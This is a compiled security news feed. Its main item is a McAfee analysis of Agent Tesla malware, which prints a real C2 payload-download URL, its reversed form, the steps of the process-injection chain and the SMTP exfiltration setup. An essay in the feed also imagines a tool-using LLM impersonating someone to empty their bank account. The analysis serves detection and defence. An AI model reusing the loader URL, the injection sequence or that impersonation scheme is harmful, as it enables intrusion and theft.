golang-1.19.13-1.fc37

Read Time:10 Second

FEDORA-2023-a9da32bf13

Packages in this update:

golang-1.19.13-1.fc37

Update description:

This release includes fixes to the go command, the crypto/tls and net/http packages, and several others.


How Typosquatting Scams Work

Read Time:3 Minute, 57 Second

Your teacher was right. Spelling counts, particularly to scammers.

Enter the world of typosquatting scams. Also known as URL hijacking, typosquatting scams target internet users who incorrectly type a website address into their web browser.

Scammers have long used typosquatting techniques to capture traffic from those butterfingers moments we all have when typing on our keyboards. And the butterthumbs moments on our phones.

For example, say you type “websiteaddresss dot-com” instead of “websiteaddress dot-com.” More than just a mistake, a mistyped address might land you on a malicious site designed to steal personal information, make money, or spread malware.

The scam sites you might land on vary. Some serve up a screenload of spammy ads. Others host malicious download links, and yet more lead to stores full of cheap, knockoff goods. In other cases, scammers take it up a notch. We’ve seen typosquatting sites evolve into clever copycats of legitimate sites. Some look like real banking and e-commerce sites that they steal traffic from, complete with stolen logos and familiar login screens. With this, scammers hope to trick you into entering your passwords and other sensitive information.

Companies are well aware of this practice. Many purchase URLs with those common misspellings and redirect them to their proper sites. Further, many brands put up anti-fraud pages on their sites that list the legitimate addresses they use to contact customers. Here at McAfee, we have an anti-fraud center of our own.
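Brand owners and defenders can flag such near-miss domains programmatically. Below is a minimal sketch using edit distance; the brand list and the threshold of two edits are illustrative assumptions, not part of any real product.

```python
# Hypothetical sketch: flag a typed domain that is within a couple of
# edits of a well-known brand domain (brand list is illustrative).
def edit_distance(a: str, b: str) -> int:
    # Classic dynamic-programming Levenshtein distance
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]

BRANDS = ["websiteaddress.com", "example.com"]

def looks_typosquatted(domain: str) -> bool:
    # Zero distance means it IS the brand; 1-2 edits away is suspicious
    return any(0 < edit_distance(domain, brand) <= 2 for brand in BRANDS)
```

Here `edit_distance("websiteaddresss.com", "websiteaddress.com")` is 1, so the doubled-letter typo from the example above gets flagged, while the correctly spelled domain does not.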

The fact remains, people make mistakes. And that can lead to risky scam sites. However, you can still avoid typosquatting attacks quite easily.

The big business of typosquatting

For starters, it helps to know that typosquatting is often big business. In many cases, larger cybercrime organizations set up entire flights of malicious sites, numbering from the dozens into the hundreds.

Let’s check out a few examples and see just how sophisticated typosquatting scams can be:

“dot.cm” scams

In 2018, researchers found a host of addresses registered in the names of well-known sites but ending in “.cm” instead of “.com”. These copycat addresses included financial websites, such as “Chase dot-cm” and “Citicards dot-cm,” as well as social and streaming sites.

Scammers used the .cm sites to advertise promotions and surveys used to collect users’ personal information. What’s more, more than 1,500 of them were registered to the same email address, indicating that someone was trying to turn typosquatting into a serious business.

“dot.om” scams

Similarly, 2016 saw the advent of malicious dot-om sites that mimicked big names like “linkedin dot-om” and “walgreens dot-om.” Even the interesting typo “youtubec dot-om” cropped up. Of note, single entities registered these sites in batches: researchers found that individuals or companies registered anywhere from 18 to 96 of them. Again, signs of serious business.

Big brand and voice assistant typosquatting scams

Recently, security researchers found a further increase in the number of typosquatting sites: up 10% from 2021 to 2022. These sites mimic popular app stores, Microsoft addresses, and services like TikTok, Snapchat, and PayPal, among many others.

Further, scammers have gotten wise to the increased use of personal assistants to look up web addresses on phones and in homes. Typosquatting now includes soundalike names in addition to lookalike names. With that, they can capitalize when an assistant doesn’t quite hear a command properly.
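One way soundalike matching can be approximated is phonetic hashing. The sketch below uses the classic Soundex algorithm; the brand words are illustrative, and a real detector would be far more elaborate.

```python
# Minimal Soundex sketch: keep the first letter, map consonants to
# digit classes, drop vowels, and collapse adjacent repeats. Strip
# punctuation (dots, hyphens) from domain words before hashing.
def soundex(word: str) -> str:
    mapping = {}
    for letters, digit in [("BFPV", "1"), ("CGJKQSXZ", "2"), ("DT", "3"),
                           ("L", "4"), ("MN", "5"), ("R", "6")]:
        for ch in letters:
            mapping[ch] = digit
    word = word.upper()
    code = [word[0]]
    prev = mapping.get(word[0], "")
    for ch in word[1:]:
        digit = mapping.get(ch, "")
        if digit and digit != prev:
            code.append(digit)
        if ch not in "HW":  # H and W do not reset the previous code
            prev = digit
    return "".join(code + ["0", "0", "0"])[:4]
```

For example, `soundex("paypal")` and `soundex("paypall")` both yield "P140", so a catalog of brand names hashed this way can flag registrations that sound identical when spoken aloud to an assistant.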

How to protect yourself from typosquatting

No doubt, slip-ups happen when browsing. Yet you can minimize how often with a few steps—and give yourself an extra line of defense if a mistake still slips through.

Whether you type a web address into the address bar or a search engine, check that you’ve spelled the address correctly before you hit “return.”
If you are going to a website where you might share private information, look for the padlock symbol in the browser’s address bar. This indicates that the site uses encryption to secure the data that you share. Keep in mind that a padlock alone doesn’t prove a site is legitimate, so double-check the address itself too.
Be suspicious of websites with low-quality graphics or misspellings. These are telltale signs of fake websites.
Consider bookmarking sites you visit regularly to make sure you get to the right site, each time.
Don’t click on links in emails, text messages, and popup messages unless you know and trust the sender.
Consider using a safe browsing tool such as McAfee Web Protection, which can help you avoid dangerous links, bad downloads, malicious websites, and more.​
Always use comprehensive online protection software like ours on your computers and devices to protect you from malware and other online threats.

The post How Typosquatting Scams Work appeared first on McAfee Blog.


Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion

Read Time:10 Minute, 45 Second

Authored by Yashvi Shah

Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.

Generally, Agent Tesla uses deceptive emails to infect victims, disguising as business inquiries or shipment updates. Opening attachments triggers malware installation, concealed through obfuscation. The malware then communicates with a command server to extract compromised data.

The following heat map shows the current prevalence of Agent Tesla in the field:

Figure 1: Agent Tesla heat map

McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.

Technical Analysis

The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.

Figure 2: Infection Chain

VBS needs a scripting host such as wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS file is executed, wscript.exe invokes the initial PowerShell command.

Figure 3: Process Tree

First PowerShell command

The first PowerShell command is encoded as illustrated here:

Figure 4: Encoded First PowerShell

Obfuscating PowerShell commands serves as a defense mechanism employed by malware authors to make their malicious intentions harder to detect. This technique involves intentionally obfuscating the code by using various tricks, such as encoding, replacing characters, or using convoluted syntax. This runtime decoding is done to hide the true nature of the command from static analysis tools that examine the code without execution. Upon decoding, achieved by substituting occurrences of ‘#@$#’ with ‘A’ and subsequently applying base64-decoding, we successfully retrieved the decrypted PowerShell content as follows:
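The decoding described here is easy to reproduce on the defender side. A minimal sketch follows; the obfuscated sample string is a harmless stand-in, not the real script content.

```python
import base64

# Defender-side sketch of the first decoding stage described above:
# restore 'A' wherever the script wrote the filler token '#@$#', then
# base64-decode the result.
def decode_stage1(blob: str) -> str:
    return base64.b64decode(blob.replace('#@$#', 'A')).decode('utf-8', 'replace')

# Harmless stand-in payload, obfuscated the same way the malware does
obfuscated = base64.b64encode(b"Invoke-WebRequest").decode().replace('A', '#@$#')
```

Running `decode_stage1(obfuscated)` recovers the original text, mirroring the substitution-then-base64 scheme observed in the sample.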

Figure 5: Decoded content

Second PowerShell Command

The deciphered content serves as the parameter passed to the second instance of PowerShell.

Figure 6: Second PowerShell command

Deconstructing this command line for clearer comprehension:

Figure 7: Disassembled command

Steganography

As observed, the PowerShell command instructs the download of an image from the URL stored in the variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:

Figure 8: Downloaded image

This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable ‘base64Length’. The data enclosed between these markers is stored in ‘base64Command’. The subsequent images illustrate these markers and the content encapsulated between them.

Figure 9: Steganography

After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.

Figure 10: DLL obtained from steganography

Process Injection into RegAsm.exe

This DLL serves two purposes:

Downloading and decoding the final payload
Injecting it into RegAsm.exe

Figure 11: DLL loaded

In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:

$arguments = ,('txt.46ezabwenrtsac/42.021.871.591//:ptth')

The instruction mandates reversing the content of this parameter and subsequently storing the outcome in the variable named ‘address.’ Upon reversing the argument, it transforms into:

http://195.178.120.24/castrnewbaze64.txt

Figure 12: Request for payload

Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.

Figure 13: Downloaded text file

In Figure 11, at marker 2, the contents of the “text” variable are reversed and written back to the same variable. Subsequently, at marker 3, the data stored in the “text” variable is subjected to base64 decoding. Following this, we determined that the file is a .NET compiled executable.
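Both obfuscation layers described here, the reversed C2 URL from Figure 7 and the reversed, base64-encoded text file, can be undone with a few lines. The URL and payload bytes below are harmless stand-ins for the real artifacts.

```python
import base64

def reverse_string(s: str) -> str:
    # Both the C2 URL and the downloaded text file are stored backwards
    return s[::-1]

def decode_payload(text: str) -> bytes:
    # Reverse, then base64-decode, as the DLL does at markers 2 and 3
    raw = base64.b64decode(reverse_string(text))
    # A Windows PE file (including .NET executables) starts with 'MZ'
    if raw[:2] != b'MZ':
        raise ValueError('decoded data is not a PE file')
    return raw
```

For instance, `reverse_string('txt.daolyap/moc.elpmaxe//:ptth')` yields `http://example.com/payload.txt`, the same trick used to hide the real download address.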

Figure 14: Final payload

In Figure 11, another activity is evident at marker 3, where the process path for the upcoming process injection is specified. The designated process path for the process injection is:

“C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe”.

Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.

Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:

Figure 15: Process Injection

By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function ‘hU0H4qUiSpCA13feW0’ is used for replacing content. For example,

"kern!".Replace("!", "el32") → kernel32

Class1.hU0H4qUiSpCA13feW0("qllocEx", "q", "VirtualA") → VirtualAllocEx
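The substitution itself is trivial to replicate when writing deobfuscation tooling; the sketch below mirrors the two calls shown above.

```python
# Mimics the .NET string.Replace trick the sample uses to assemble API
# names at runtime, keeping them out of static string dumps.
def rebuild(template: str, old: str, new: str) -> str:
    return template.replace(old, new)
```

Here `rebuild("kern!", "!", "el32")` gives "kernel32" and `rebuild("qllocEx", "q", "VirtualA")` gives "VirtualAllocEx", matching the two calls observed in the sample.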

As a result, these functions translate into the subsequent API calls:

CreateProcessA: This API creates a new process. While injection usually targets an existing process, in this chain it is likely used to spawn the target process (RegAsm.exe) in a suspended state so that its memory can be replaced with the payload, consistent with process hollowing.
VirtualAllocEx: This is often used in process injection to allocate memory within the target process to host the injected code.
ReadProcessMemory: This is used to read the memory of a target process. It is typically used in reflective DLL injection to read the contents of a DLL from the injector’s memory and write it into the target process.
GetThreadContext: This API is used to retrieve the context (registers, flags, etc.) of a thread within a target process. It’s useful for modifying thread execution flow during injection.
Wow64GetThreadContext: This is like GetThreadContext, but it’s used when dealing with 32-bit processes on a 64-bit system.
SetThreadContext: This API is used to set the context of a thread within a target process. This can be useful for modifying the execution flow.
Wow64SetThreadContext: Like SetThreadContext, but for 32-bit processes on a 64-bit system.
ZwUnmapViewOfSection: This is used to unmap a section of a process’s virtual address space, which could potentially be used to remove a DLL loaded into a target process during injection.
WriteProcessMemory: This is used to write data into the memory of a target process. It’s commonly used for injecting code or data into a remote process.
ResumeThread: This is used to resume the execution of a suspended thread, often after modifying its context or injecting code.

Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.

The final executable is heavily obfuscated. It employs an extensive array of switch cases and superfluous code, strategically intended to mislead researchers and complicate analysis. Many of the functions rely on switch cases, or equivalent constructs, to evade detection. The following snippet of code depicts this:

Figure 16: Obfuscation

Collection of data:

Fingerprinting:

Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:

Computer Name
IP information
Win32_BaseBoard: SerialNumber
Win32_Processor: ProcessorId
Win32_NetworkAdapterConfiguration: MACAddress

Web Browsers:

Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.

Figure 17: Opera browser

Figure 18: Yandex browser

Figure 19: Iridium browser

Figure 20: Chromium browser

Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:

Figure 21: User data retrieval from all browsers -1

Figure 22: User data retrieval from all browsers – 2

Mail Clients:

Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:

Figure 23: Mail clients

Exfiltration:

Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.

The observed sample uses SMTP as its exfiltration channel. Attackers frequently favor this protocol because it imposes minimal overhead: it is efficient, widely allowed on networks, rides on existing mail infrastructure, produces few anomalies, and looks less suspicious than custom protocols. A single compromised email account is enough to receive the stolen data, minimizing the need for complex setups.

Figure 24: Function calls made for exfiltration

This is the procedure by which functions are invoked to facilitate data extraction via SMTP:

A specific value is provided as a parameter, and this value is processed within the functions. As a result, it ultimately determines the port number to be utilized for SMTP communication. In this case, port number 587 is used for communication.

Figure 25: Port number

Next, the malware retrieves the hostname of the email address it intends to utilize i.e., corpsa.net.

Figure 26: Domain retrieval

Subsequently, the email address through which communication is intended to occur is revealed.

Figure 27: Email address used

Lastly, the password for that email address is provided, so that the attacker can log in and start sending out the data.

Figure 28: Password

In summary, the SMTP setup proceeds in a fixed order: a processed parameter value determines the port, after which the malware retrieves the mail domain, the sender address, and finally the corresponding password, giving it everything it needs to establish the connection.

Following these steps, the malware efficiently establishes a login using acquired credentials. Once authenticated, it commences the process of transmitting the harvested data to a designated email address associated with the malware itself.

Summary:

The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.

Indicators of compromise (IoC):

VBS file
MD5: e2a4a40fe8c8823ed5a73cdc9a8fa9b9
SHA256: e7a157ba1819d7af9a5f66aa9e161cce68d20792d117a90332ff797cbbd8aaa5

JPEG file
MD5: ec8dfde2126a937a65454323418e28da
SHA256: 21c5d3ef06d8cff43816a10a37ba1804a764b7b31fe1eb3b82c144515297875f

DLL file
MD5: b257f83495996b9a79d174d60dc02caa
SHA256: b2d667caa6f3deec506e27a5f40971cb344b6edcfe6182002f1e91ce9167327f

Final payload
MD5: dd94daef4081f63cf4751c3689045213
SHA256: abe5c5bb02865ac405e08438642fcd0d38abd949a18341fc79d2e8715f0f6e42

Table 1: Indicators of Compromise

The post Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion appeared first on McAfee Blog.


LLMs and Tool Use

Read Time:6 Minute, 41 Second

Last March, just two weeks after GPT-4 was released, researchers at Microsoft quietly announced a plan to compile millions of APIs—tools that can do everything from ordering a pizza to solving physics equations to controlling the TV in your living room—into a compendium that would be made accessible to large language models (LLMs). This was just one milestone in the race across industry and academia to find the best ways to teach LLMs how to manipulate tools, which would supercharge the potential of AI more than any of the impressive advancements we’ve seen to date.

The Microsoft project aims to teach AI how to use any and all digital tools in one fell swoop, a clever and efficient approach. Today, LLMs can do a pretty good job of recommending pizza toppings to you if you describe your dietary preferences and can draft dialog that you could use when you call the restaurant. But most AI tools can’t place the order, not even online. In contrast, Google’s seven-year-old Assistant tool can synthesize a voice on the telephone and fill out an online order form, but it can’t pick a restaurant or guess your order. By combining these capabilities, though, a tool-using AI could do it all. An LLM with access to your past conversations and tools like calorie calculators, a restaurant menu database, and your digital payment wallet could feasibly judge that you are trying to lose weight and want a low-calorie option, find the nearest restaurant with toppings you like, and place the delivery order. If it has access to your payment history, it could even guess at how generously you usually tip. If it has access to the sensors on your smartwatch or fitness tracker, it might be able to sense when your blood sugar is low and order the pie before you even realize you’re hungry.

Perhaps the most compelling potential applications of tool use are those that give AIs the ability to improve themselves. Suppose, for example, you asked a chatbot for help interpreting some facet of ancient Roman law that no one had thought to include examples of in the model’s original training. An LLM empowered to search academic databases and trigger its own training process could fine-tune its understanding of Roman law before answering. Access to specialized tools could even help a model like this better explain itself. While LLMs like GPT-4 already do a fairly good job of explaining their reasoning when asked, these explanations emerge from a “black box” and are vulnerable to errors and hallucinations. But a tool-using LLM could dissect its own internals, offering empirical assessments of its own reasoning and deterministic explanations of why it produced the answer it did.

If given access to tools for soliciting human feedback, a tool-using LLM could even generate specialized knowledge that isn’t yet captured on the web. It could post a question to Reddit or Quora or delegate a task to a human on Amazon’s Mechanical Turk. It could even seek out data about human preferences by doing survey research, either to provide an answer directly to you or to fine-tune its own training to be able to better answer questions in the future. Over time, tool-using AIs might start to look a lot like tool-using humans. An LLM can generate code much faster than any human programmer, so it can manipulate the systems and services of your computer with ease. It could also use your computer’s keyboard and cursor the way a person would, allowing it to use any program you do. And it could improve its own capabilities, using tools to ask questions, conduct research, and write code to incorporate into itself.
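The orchestration described above boils down to a dispatch loop: the model emits a structured tool call, a harness executes it, and the result is fed back as the model's next observation. The toy sketch below illustrates the shape of that loop; the tool names and the canned stand-in "model" are entirely hypothetical.

```python
import json

# Registry of callable tools the model is allowed to request
TOOLS = {
    "search_menu": lambda topping: ["Napoli Pizza"] if topping == "mushroom" else [],
    "place_order": lambda restaurant: f"order sent to {restaurant}",
}

def fake_model(observation: str) -> str:
    # Stand-in for an LLM: emits a JSON tool call based on what it has seen
    if "restaurants" not in observation:
        return json.dumps({"tool": "search_menu", "arg": "mushroom"})
    return json.dumps({"tool": "place_order", "arg": "Napoli Pizza"})

def agent_step(observation: str) -> str:
    call = json.loads(fake_model(observation))
    result = TOOLS[call["tool"]](call["arg"])
    # Feed tool results back as the next observation
    return f"restaurants={result}" if call["tool"] == "search_menu" else result
```

A real harness would loop until the model emits a final answer instead of a tool call, and would validate tool arguments before executing anything, which is exactly where the risk controls discussed below have to live.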

It’s easy to see how this kind of tool use comes with tremendous risks. Imagine an LLM being able to find someone’s phone number, call them and surreptitiously record their voice, guess what bank they use based on the largest providers in their area, impersonate them on a phone call with customer service to reset their password, and liquidate their account to make a donation to a political party. Each of these tasks invokes a simple tool—an Internet search, a voice synthesizer, a bank app—and the LLM scripts the sequence of actions using the tools.

We don’t yet know how successful any of these attempts will be. As remarkably fluent as LLMs are, they weren’t built specifically for the purpose of operating tools, and it remains to be seen how their early successes in tool use will translate to future use cases like the ones described here. As such, giving the current generative AI sudden access to millions of APIs—as Microsoft plans to—could be a little like letting a toddler loose in a weapons depot.

Companies like Microsoft should be particularly careful about granting AIs access to certain combinations of tools. Access to tools to look up information, make specialized calculations, and examine real-world sensors all carry a modicum of risk. The ability to transmit messages beyond the immediate user of the tool or to use APIs that manipulate physical objects like locks or machines carries much larger risks. Combining these categories of tools amplifies the risks of each.

The operators of the most advanced LLMs, such as OpenAI, should continue to proceed cautiously as they begin enabling tool use and should restrict uses of their products in sensitive domains such as politics, health care, banking, and defense. But it seems clear that these industry leaders have already largely lost their moat around LLM technology—open source is catching up. Recognizing this trend, Meta has taken an “If you can’t beat ’em, join ’em” approach and partially embraced the role of providing open source LLM platforms.

On the policy front, national—and regional—AI prescriptions seem futile. Europe is the only significant jurisdiction that has made meaningful progress on regulating the responsible use of AI, but it’s not entirely clear how regulators will enforce it. And the US is playing catch-up and seems destined to be much more permissive in allowing even risks deemed “unacceptable” by the EU. Meanwhile, no government has invested in a “public option” AI model that would offer an alternative to Big Tech that is more responsive and accountable to its citizens.

Regulators should consider what AIs are allowed to do autonomously, like whether they can be assigned property ownership or register a business. Perhaps more sensitive transactions should require a verified human in the loop, even at the cost of some added friction. Our legal system may be imperfect, but we largely know how to hold humans accountable for misdeeds; the trick is not to let them shunt their responsibilities to artificial third parties. We should continue pursuing AI-specific regulatory solutions while also recognizing that they are not sufficient on their own.

We must also prepare for the benign ways that tool-using AI might impact society. In the best-case scenario, such an LLM may rapidly accelerate a field like drug discovery, and the patent office and FDA should prepare for a dramatic increase in the number of legitimate drug candidates. We should reshape how we interact with our governments to take advantage of AI tools that give us all dramatically more potential to have our voices heard. And we should make sure that the economic benefits of superintelligent, labor-saving AI are equitably distributed.

We can debate whether LLMs are truly intelligent or conscious, or have agency, but AIs will become increasingly capable tool users either way. Some things are greater than the sum of their parts. An AI with the ability to manipulate and interact with even simple tools will become vastly more powerful than the tools themselves. Let’s be sure we’re ready for them.

This essay was written with Nathan Sanders, and previously appeared on Wired.com.


AT&T Cybersecurity serves as critical first responder during attack on municipality

Read Time:1 Minute, 24 Second

Earlier this year, analysts in the AT&T Cybersecurity Managed Threat Detection and Response (MTDR) security operations center (SOC) were alerted to a potential ransomware attack on a large municipal customer. The attack, which was subsequently found to have been carried out by members of the Royal ransomware group, affected several departments and temporarily disrupted critical communications and IT systems.

During the incident, AT&T analysts served as critical first responders, promptly investigating alarms in the USM Anywhere platform and quickly communicating the issue to the customer. They also provided extensive after-hours support at the height of the attack—as the customer shared updates on impacted servers and services, the analysts gave guidance on containment and remediation. They shared all observed indicators of compromise (IOCs) with the customer, some of which included IP addresses and domains that could be blocked quickly by the AT&T Managed Firewall team because the customer was also using AT&T’s managed firewall services.

Just 24 hours after initial communications, analysts had compiled and delivered to the customer a detailed report on the incident findings. The report included recommendations on how to help protect against future ransomware attacks as well as suggested remediation actions the customer should take in the event that legal, compliance, or deeper post-incident forensic review is needed.

Read our case study to learn more about how our analysts helped the customer accelerate their time to respond and contain the damage from the attack, and learn how the AT&T Alien Labs threat intelligence team has used the findings from this incident to help secure all AT&T Cybersecurity managed detection and response customers!
